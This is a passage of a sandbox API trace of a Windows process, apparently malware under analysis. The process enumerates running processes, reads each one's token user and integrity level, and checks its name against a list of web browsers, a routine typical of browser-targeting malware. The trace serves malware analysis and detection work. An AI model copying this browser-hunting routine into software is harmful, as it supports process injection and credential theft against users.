(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xbc [0247.571] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.571] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.571] GetLastError () returned 0x7a [0247.571] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.571] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.571] CloseHandle (hObject=0x114) returned 1 [0247.571] CloseHandle (hObject=0xbc) returned 1 [0247.571] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.572] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.572] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.572] GetLastError () returned 0x7a [0247.572] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.572] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.572] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.572] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0247.572] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0247.572] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0247.572] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0247.572] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0247.572] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0247.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xbc [0247.572] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.572] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.573] GetLastError () returned 0x7a [0247.573] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.573] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.573] CloseHandle (hObject=0x114) returned 1 [0247.573] CloseHandle (hObject=0xbc) returned 1 [0247.573] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.573] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.573] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.573] GetLastError () returned 0x7a [0247.573] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.573] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.573] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.573] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0247.573] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0247.573] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0247.573] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0247.574] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0247.574] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0247.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xbc [0247.574] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.574] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.574] GetLastError () returned 0x7a [0247.574] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.574] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.574] CloseHandle (hObject=0x114) returned 1 [0247.574] CloseHandle (hObject=0xbc) returned 1 [0247.574] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.574] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.574] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.574] GetLastError () returned 0x7a [0247.574] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.575] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.575] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.575] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.575] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0247.575] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.575] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.575] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.575] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0247.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xbc [0247.575] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.575] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.575] GetLastError () returned 0x7a [0247.575] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.575] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.575] CloseHandle (hObject=0x114) returned 1 [0247.575] CloseHandle (hObject=0xbc) returned 1 [0247.575] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.576] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.576] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.576] GetLastError () returned 0x7a [0247.576] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.576] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.576] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.576] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0247.576] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0247.576] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0247.576] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0247.576] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0247.576] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0247.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xbc [0247.576] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.576] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.576] GetLastError () returned 0x7a [0247.577] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.577] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.577] CloseHandle (hObject=0x114) returned 1 [0247.577] CloseHandle (hObject=0xbc) returned 1 [0247.577] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.577] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.577] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.577] GetLastError () returned 0x7a [0247.577] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.577] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.577] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.577] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0247.577] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0247.577] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0247.577] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0247.577] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0247.577] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0247.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xbc [0247.578] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.578] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.578] GetLastError () returned 0x7a [0247.578] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.578] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.578] CloseHandle (hObject=0x114) returned 1 [0247.578] CloseHandle (hObject=0xbc) returned 1 [0247.578] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.578] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.578] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.578] GetLastError () returned 0x7a [0247.578] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.578] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.578] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.578] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0247.578] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0247.578] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0247.578] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0247.578] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0247.578] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0247.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0247.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0247.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0247.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0247.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0247.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xbc [0247.579] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.579] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.579] GetLastError () returned 0x7a [0247.579] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.579] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.579] CloseHandle (hObject=0x114) returned 1 [0247.579] CloseHandle (hObject=0xbc) returned 1 [0247.579] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.579] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.580] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.580] GetLastError () returned 0x7a [0247.580] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.580] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.580] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.580] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0247.580] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0247.580] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0247.580] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0247.580] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0247.580] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0247.580] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0247.580] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0249.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xbd08) returned 0xc0000004 [0249.592] VirtualAlloc (lpAddress=0x0, dwSize=0xcd08, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0249.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xcd08, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0249.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xbc [0249.593] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.593] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.593] GetLastError () returned 0x7a [0249.593] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.593] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.593] CloseHandle (hObject=0x114) returned 1 [0249.593] CloseHandle (hObject=0xbc) returned 1 [0249.593] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.593] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.593] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.593] GetLastError () returned 0x7a [0249.593] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.593] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.593] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.593] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0249.593] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0249.593] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0249.593] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 